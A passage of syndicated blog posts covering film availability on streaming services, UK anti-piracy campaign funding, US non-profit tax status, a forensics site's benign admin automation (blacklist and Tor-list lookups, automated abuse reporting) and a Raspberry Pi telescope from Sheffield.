The MPAA is right that most of the movies are available through online stores and rental services. However, the Hollywood group conveniently ignores the lack of availability on popular subscription platforms such as Netflix and Hulu.

This is not a minor oversight as the study finds that availability of top films on Netflix and other subscription services is very low.

Although KPMG decided not to mention it in the executive summary of the report, the findings show that only 16% of the films are available through on-demand subscription services (SOVD).

Availability of the top films

The above sheds a different light on the availability argument: what good is it if 94 percent of the films are available online, but (at least) 84 percent are missing from the most-used movie service?

After all, most people prefer to get their movies in one place as it’s not very convenient to use a few dozen services to get your movie fix.

Of course this is not an excuse for people to go out and download films without permission, and we have to admit that a lot of progress has been made on the availability side in recent years. However, Hollywood can definitely learn from the music industry, where most of the popular content is available through subscription services.

From the availability point of view there’s another issue worth pointing out. The most pirated titles are usually recent releases, and these are generally not available, not even through iTunes, Amazon or rental services.

This is also illustrated in the KPMG report which shows that 100% of the top 2012 films are available online, compared to 77% of the 2013 releases. It’s probably safe to say that the majority of all pirated downloads are of films that are not yet legally available.

In other words, there’s still plenty of improvement possible.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Bradley M. Kuhn's Blog ( bkuhn ): IRS Tax-Exempt Status & FaiF 0x4E

This post was syndicated from: Bradley M. Kuhn's Blog ( bkuhn ) and was written by: Bradley M. Kuhn. Original post: at Bradley M. Kuhn's Blog ( bkuhn )

Historically, I used to write a blog post for each episode of the audcast, Free as in Freedom, that Karen Sandler and I released. However, since I currently do my work on FaiF exclusively as a volunteer, I often found it difficult to budget time for a blog post about each show.

However, enough happened in between when Karen and I recorded FaiF 0x4E and when it was released earlier this week that I thought I’d comment on those events.

First, with regard to the direct content of the show, I’ve added some detail in the 0x4E show notes about additional research I did about various other non-software-related non-profit organizations that I mention in the show.

The primary thrust of Karen’s and my discussion on the show, though, regarded how the IRS is (somewhat strangely) the regulatory body for various types of organizational statuses, and that our legislation lumps many disparate activities together under the term “non-profit organizations” in the USA. The types of these available, outlined in 26 USC §501(c), vary greatly in what they do, and in what the IRS intends for them to do.

Interestingly, a few events occurred in mainstream popular culture since FaiF 0x4E’s recording that relate to this subject. First, on John Oliver’s Last Week Tonight Episode 18 on 2014-09-21 (skip to 08:30 in the video to see the part I’m commenting on), John actually pulled out a stack of interlocking Form 990s from various related non-profit organizations and walked through some details of misrepresentation to the public regarding the organization’s grant-making activities. As an avid reader of Form 990s, I was absolutely elated to see a popular comic pundit actually assign his staff the task of reviewing Form 990s to follow the money. (Although I wish he hadn’t wasted the paper to print them out merely to make a sight gag.)

Meanwhile, the failure of just about everyone to engage in such research remains my constant frustration. I’m often amazed that people judge non-profit organizations merely based on a (Stephen-Colbert-style) gut reaction of truthiness rather than researching the budgetary actions of such organizations. Given that tendency, the mandatory IRS public disclosures for all these various non-profits end up almost completely hidden in plain sight.

Granted, you sometimes have to make as many as three clicks, and type the name of the organization twice on Foundation Center’s Form 990 finder to find these documents. That’s why I started to maintain the FLOSS Foundation gitorious repository of Form 990s of all the orgs related to Open Source and Free Software — hoping that a git-clone-able solution would be more appealing to geeks. Yet, it’s rare that anyone besides those of us who maintain the repository read these. The only notable exception is Brian Proffitt’s interesting article back in March 2012, which made use of FLOSS Foundation Form 990 data. But, AFAIK, that’s the only time the media has looked at any FLOSS Foundations’ Form 990s.

The final recent story related to non-profits was linked to by Conservancy Board of Directors member, Mike Linksvayer on identi.ca. In the article from Slate Mike references there, Jordan Weissmann points out that the NFL is a 501(c)(6). Weissmann further notes that permission for football to be classified under 501(c)(6) rules seems like pork barrel politics in the first place.

These disparate events — the Tea Party attacks against IRS 501(c)(4) denials, John Oliver’s discussion of the Miss America Organization, Weissmann’s specific angle in reporting the NFL scandals, and (more parochially) Yorba’s 501(c)(3) and OpenStack Foundation’s 501(c)(6) application denials — are brief moments of attention on non-profit structures in the USA. In such moments, we’re invited to dig deeper and understand what is really going on, using public information that’s readily accessible. So, why do so many people use truthiness rather than data to judge the performance and behavior of non-profit organizations? Why do so many funders, grant-makers and donors admit to never even reading the Form 990 of the organizations whom they support and with whom they collaborate? I ask, of course, rhetorically, but I’d be delighted if there is any answer beyond: “because they’re lazy”.

The Hacker Factor Blog: Works Like a Charm

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

As a software developer, one of my core philosophies is to automate common tasks. If you have to do something more than once, then it is better to automate it.

Of course, there always is that trade-off between the time to automate and the time saved. If a two-minute task takes 20 hours to automate, then it’s probably faster (and a better use of your time) to do it manually when needed. However, if you need to do it hundreds of times, then it’s better to spend 20 hours automating it.

Sometimes you may not even realize how often you do a task. All of those minutes may not seem like much, but they can really add up.

Work Harder, Not Smarter

FotoForensics is currently receiving over 1,000 unique pictures per day. We’re at the point where we can either (A) hire more administrators, or (B) simplify existing administrative duties.

Recently I’ve been taking a closer look at some of the tasks we manually perform. Things like categorizing content for various research projects, identifying trends, scanning content for “new” features that run the gamut from new devices to new attacks, reviewing flagged content, and responding to user requests. A lot of these tasks are time-consuming and performed more than once. And a few of them can be automated.

Blacklists
Network abuses come in many different forms. Users may upload prohibited content, automate submissions, attack the site with port scans and vulnerability tests, or submit comment-spam to our contact form. It’s always a good idea to check abusers against known blacklists. This tells me whether it is a wide-spread abuse or if my site is just special.

There are a bunch of servers that run DNS-based blacklists. They all work in similar ways:

  1. You encode the query as a hostname. Like “2.1.9.127.dnsbl.whatever”. This encodes the IP address in reverse-notation: 127.9.1.2.
  2. You perform a DNS hostname lookup.
  3. The DNS result encodes the response as an IP address. Different DNSBL servers have different encoded values, but they typically report suspicious behavior, known proxies, and spammers.
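
As a minimal sketch of that lookup flow (the zone name below is a placeholder, not a real blacklist service), the whole check fits in a few lines of Python:

    import socket

    def dnsbl_lookup(ip, zone="dnsbl.example.org"):
        """Return the DNSBL answer for ip, or None if it is not listed.

        The zone is a placeholder; substitute the DNSBL service you query.
        """
        reversed_ip = ".".join(reversed(ip.split(".")))   # 127.9.1.2 -> 2.1.9.127
        query = "{0}.{1}".format(reversed_ip, zone)
        try:
            return socket.gethostbyname(query)            # e.g. 127.0.0.2 if listed
        except socket.gaierror:
            return None                                    # NXDOMAIN: not listed

    print(dnsbl_lookup("127.9.1.2"))

The meaning of the returned address (spam source, open proxy, harvester and so on) varies from list to list, which is exactly the matching problem described next.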

Some DNSBL servers seem too focused for my use. For example, if they only report known-spam systems and not proxies or malware, then it will rarely find a match for my non-spam queries. Other DNSBL systems seem to have dated content, with lists of proxies that have not been active for years. (One system will quickly add proxies but won’t remove them without a request. So dead proxies remain listed indefinitely.)

Most DNSBL servers focus on anti-spam. They report whether the address was used to send spam, harvest addresses, or other related actions. Ideally, I’d like a DNSBL that focuses on other hostile activities: network scanners, attackers, and proxies. But for now, looking for other abuses, like harvesters and comment-spam, is good enough.

Anonymous Proxies
I believe that anonymous proxies are important. They permit whistle-blowers to make anonymous reports and allow people to discuss personal issues without the fear of direct retribution. Groups like “Alcoholics Anonymous” would not be as successful if members had to be fully outed.

Unfortunately, anonymity also permits abuses. The new automated system downloads the list of TOR nodes daily. This allows us to easily check if a ban is tied to a TOR node. We don’t ban every TOR node. Instead, we only ban the nodes used for uploading prohibited content to the site.

For beginner TOR users, this may not make sense. Banning one node won’t stop the problem since the user will just change nodes. Except… Not all TOR nodes are equal. Nodes that can handle a higher load are given a higher weight and are more likely to carry traffic. We’ve only banned about 300 of the 6,100 TOR nodes, but that seems to have stopped most abuses from TOR. (And best yet: only about a dozen of these bans were manually performed — most were caught by our auto-ban system.)
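
A sketch of that daily check in Python might look like the following; the exit-list URL is an assumption (the Tor Project publishes such lists, but the site may pull its copy from elsewhere):

    import urllib.request

    # Plain-text list of Tor exit addresses, one per line (assumed source).
    TOR_EXIT_LIST = "https://check.torproject.org/torbulkexitlist"

    def load_tor_exits(url=TOR_EXIT_LIST):
        with urllib.request.urlopen(url) as response:
            lines = response.read().decode("utf-8").splitlines()
        return {line.strip() for line in lines if line.strip() and not line.startswith("#")}

    def is_tor_exit(ip, exits):
        return ip in exits

    exits = load_tor_exits()             # refreshed once a day, as described above
    print(is_tor_exit("203.0.113.5", exits))

Cross-referencing a new ban against that set is then a simple membership test, which is how a ban can be tied back to a TOR node without any manual digging.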

Automating History
The newly automated system also scans the logs for our own ban records and any actions made after being banned. I can tell if the network address is associated with network attacks or if the user just uploaded prohibited content. I can also tell if the user attempted to avoid the ban.

I recently had one person request a ban-removal. He claimed that he didn’t know why he was banned. After looking at the automated history report, I decided to leave the ban in place and not respond to him. But I was very tempted to write something like: “Dude… You were banned three seconds after you uploaded that picture. You saw the ban message that said to read the FAQ, and you read it twelve seconds later. Then you reloaded eight times, switched browsers, switched computers, and then tried to avoid the ban by changing your network address. And now you’re claiming that you don’t know why you were banned? Yeah, you’re still banned.”

Performing a full history search through the logs for information related to a ban used to take minutes. Now it takes one click.

NCMEC Reports
The word forensics means “relating to the use of scientific knowledge or methods in solving crimes” or “relating to, used in, or suitable to a court of law”. When you see a forensic system, you know it is geared toward crime detection and legal issues.

And people who deal in child exploitation photos know that their photos are illegal. Yet, some people are stupid enough to upload illegal pictures to FotoForensics.

The laws regarding these pictures are very explicit: we must report pictures related to child abuse and exploitation to the CyberTipline at the National Center for Missing and Exploited Children (NCMEC).

While I don’t mind the reporting requirement, I don’t like the report form. The current online form has dozens of fields and takes me more than 6 minutes to complete each time I need to submit a report. I need to gather the picture(s), information about the submitter, and other related log information. Some reports have a lot of files to attach, so they can take 12 minutes or more to complete. The total time I’ve spent using this form in the last year can be measured in days.

I’ve finally had enough of the manual submission process. I just spent a few days automating it from my side. It’s a PHP script that automatically logs in (for the session tokens), grabs the form (for the fields and any pre-populated values), fills out the data, attaches files, and submits it. It also automatically writes a short report (that I can edit with more information), records the confirmation information, and archives the stuff I am legally required to retain.
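
The script itself is PHP and specific to the CyberTipline form, so the following is only a generic Python sketch of the same flow (log in for a session, fetch the form, post the fields and attachments); every URL and field name here is hypothetical:

    import requests

    BASE = "https://reporting.example.org"   # hypothetical reporting endpoint

    session = requests.Session()

    # 1. Log in so the session cookie (and any token) is established.
    session.post(BASE + "/login", data={"user": "reporter", "pass": "secret"})

    # 2. Fetch the report form; a real script would parse out pre-populated values.
    form_page = session.get(BASE + "/report/new")

    # 3. Fill in the fields, attach the evidence files and submit.
    fields = {
        "incident_type": "upload",
        "submitter_ip": "203.0.113.5",
        "narrative": "Automated report; log excerpts attached.",
    }
    with open("evidence.zip", "rb") as attachment:
        receipt = session.post(BASE + "/report/submit",
                               data=fields, files={"attachment": attachment})

    # 4. Record the confirmation for the archive the site is required to retain.
    print(receipt.status_code, receipt.text[:200])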

Instead of taking me 6+ minutes for each report, it now takes about 3 seconds. This simplifies the entire reporting process and significantly reduces the ick-factor.

Will Work for Work

A week of programming effort (spread over three weeks) has allowed me to reduce the overhead. Administrative tasks that would take a few hours each day now take minutes.

There’s still a good number of tasks that can be automated. This includes spotting certain types of pictures that are currently being included in specific research projects, and some automated classification. I can probably add in a little more automated NCMEC reporting, for those common cases where there is no need for a manual confirmation.

Eventually I will need to get a more powerful server and maybe bring on more help. But for right now, simply automating common tasks makes the current server very manageable.

TorrentFreak: UK Govt Hopes to ‘Profit’ From Anti-Piracy Measures

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

A few weeks ago the UK Government announced its support for a new anti-piracy plan, the Voluntary Copyright Alert Programme (VCAP).

The Government teamed up with copyright holders and ISPs, who will start sending warning emails to pirating Internet users next year. In addition there will be a broader educational campaign to steer people towards using legal options.

While the campaign is a private initiative the Government has decided to back it financially with several million pounds. However, TorrentFreak has learned that the Government funding wasn’t straightforward and was made outside of the available marketing budget.

Through a Freedom of Information request we obtained an email conversation between the UK Intellectual Property Office (IPO) and music industry group BPI. In the email from May this year IPO’s Ros Lynch explains that there are no regular marketing funds available to support VCAP.

“As part of the process of agreeing Government financial support for the educational element of VCAP we will need to seek a marketing exemption as we are currently not permitted to spend on marketing,” Lynch writes to BPI’s Ian Moss.

To be able to get the exemption the Government needs additional information from the entertainment industries, showing that the investment makes sense financially. Or put differently, that the Government will see a good return for their invested taxpayer money.

“Essentially this will require a proper business case which includes hard figures,” Lynch writes.

“For example, what research are you basing your target audiences on? How have you calculated your 5% reduction in infringement? What £ saving does a 5% reduction bring? What overall estimate can you make of the ROI of this campaign e.g. what financial benefit would a £2.2m Government investment bring?”

The above suggests that the BPI is predicting a 5% drop in piracy from the anti-piracy measures. However, in a response to the IPO’s request the industry group writes that even with a lower success rate the Government’s spending will pay off.

In a “Summary Business Case” (pdf) BPI uses the expected VAT increase to convince the Government of the “profitability” of the campaign. It estimates that if 15% of all illegal downloads are lost sales, piracy only has to decline 1% over three years for the Government to recoup their investment.

“The underlying assumptions are based on very good data that has been produced by Ofcom and by a number of academic studies looking at the replacement ratios. It shows that only very small changes in piracy lead to significant returns to Government,” BPI notes.

The music industry group stresses that the calculation only looks at VAT income and that the effects on the wider economy may be even greater. However, the static model they presented should already be good enough to warrant the funding.

“So even from a very simple, static assumption, a small reduction in piracy of between .49% and 1% over the three years would return Government investment of £4m in an education scheme,” BPI writes.

This prediction was apparently good enough for the Government to invest in the new anti-piracy plans beyond the available marketing budget. Even more so, the authorities committed £3.5 million to the campaign, instead of the £2.2 million that was discussed in May.

Whether the Government will indeed be able to recoup the taxpayer money through the anti-piracy campaign will be hard to measure, but the plan is going full steam ahead.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Raspberry Pi: PiKon and other Pi projects from Sheffield University

This post was syndicated from: Raspberry Pi and was written by: Ben Nuttall. Original post: at Raspberry Pi

Sheffield has been a maker city for many years – the thriving steel industry dates back to the 14th century. Today it has the likes of Pimoroni, who recently moved in to a huge new factory, making cases, HATs, media centres and more.

The good ship Pimoroni

The University of Sheffield has been undertaking a number of Raspberry Pi projects in the last couple of years. The computer science department has a research group called Sheffield Pi-Tronics led by Hamish Cunningham. One project of note is their new Pi-powered telescope – PiKon. Not to be confused with PyCon…

The £100 3D printed Pi-powered telescope

The University has released incredible images of the moon taken with the Raspberry Pi’s camera module connected to a 3D printed telescope which costs just £100 to make from readily available parts.

The moon

Moon, the

The Pikon astro-cam is a collaborative project by the Department of Physics at the University of Sheffield and Mark Wrigley of Alternative Photonics, a small company based in north Sheffield. The project was set up to deliver a working telescope for the Festival of the Mind event.

They have a working model and they’re aiming to make all the 3D printing resources and instructions available soon. They’re also looking for help producing a simple interface to make it more accessible to all:

So far, we have a working telescope which is operated by entering command lines into the Raspberry Pi. We are looking for enthusiasts and educators to help us take things further. We want to encourage people to create, innovate, educate and share their efforts on an open source basis.

pikonic.com

How it works (from pikonic.com):

The PiKon Telescope is based on the Newtonian Reflecting Telescope. This design uses a concave mirror (objective) to form an image which is examined using an eyepiece. The mirror is mounted in a tube and a 45 degree mirror is placed in the optical path to allow the image to be viewed from the side of the tube.

The PiKon Telescope is based on a very similar design, but the image formed by the Objective is focused onto the photo sensor of a Raspberry Pi Camera. The camera sensor is exposed by simply removing (unscrewing) the lens on the Pi Camera. Because of the small size of the Raspberry Pi Camera board, it is possible to mount the assembly in the optical path. The amount of light lost by doing this is similar to the losses caused by mounting the 45 degree mirror in a conventional Newtonian design.

Former physicist and member of the Institute of Physics, Mark Wrigley, said:

We’ve called this project Disruptive Technology Astronomy because we hope it will be a game changer, just like all Disruptive Technologies.

We hope that one day this will be seen on a par with the famous Dobsonian ‘pavement’ telescopes, which allowed hobbyists to see into the night skies for the first time.

This is all about democratising technology, making it cheap and readily available to the general public.

And the PiKon is just the start. It is our aim to not only use the public’s feedback and participation to improve it, but also to launch new products which will be of value to people.

Also this week the group launched Pi Bank – a set of 20 kits containing Pi rigs that are available for short-term loan. This means local schools and other groups can make use of the kits for projects without having to invest in the technology themselves, with all the essentials, plenty of extra bits to play with – and experts on hand to help out.

See more of the Sheffield Pi-Tronics projects at pi.gate.ac.uk and read more about PiKon at pikonic.com

Any positive comments about Sheffield are completely biased as that’s where I’m from. If you’re interested in the history of Sheffield there’s a great documentary you should watch called The Full Monty.